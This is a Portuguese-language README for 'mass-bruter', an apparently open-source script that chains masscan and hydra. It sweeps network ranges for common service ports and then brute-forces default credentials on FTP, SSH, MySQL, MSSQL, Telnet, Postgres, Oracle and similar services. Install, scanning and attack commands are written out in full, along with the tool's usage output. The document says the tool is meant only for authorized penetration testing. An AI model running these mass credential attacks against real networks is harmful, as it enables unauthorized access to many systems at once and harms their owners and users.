
Autenticação por força bruta em massa de serviços comuns com credenciais comuns.
Força bruta em massa em protocolos de rede
POC simples para forçar rapidamente serviços comuns em larga escala de rede.
Ele verificará credenciais padrão em ftp, ssh, mysql, mssql...etc.
Isso foi feito apenas para fins autorizados de teste de penetração.
masscan(mais rápido que o nmap) para encontrar hosts ativos com portas comuns de um segmento de rede.masscan.hydra para forçar automaticamente serviços de rede suportados em dispositivos.Kali linux ou qualquer distribuição linux preferidaPython 3.10+# Install required tools for the script
apt update && apt install seclists masscan hydra
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
Por exemplo, alvo de um segmento de rede:
Faixa de IP privado :
10.0.0.0/8,192.168.0.0/16,172.16.0.0/12
Escaneie dispositivos e portas de 172.16.0.0/12, depois salve a saída em ./result/masscan/masscan_<any_name>.<any_ext>
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
PS : Para retomar uma varredura anterior:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Carregue o resultado do masscan e inicie a força bruta:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt

Obtenha credenciais quebradas:
python3 mass_bruteforce.py -s

┌──(root㉿root)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
dpl4hydraQuaisquer contribuições são bem-vindas!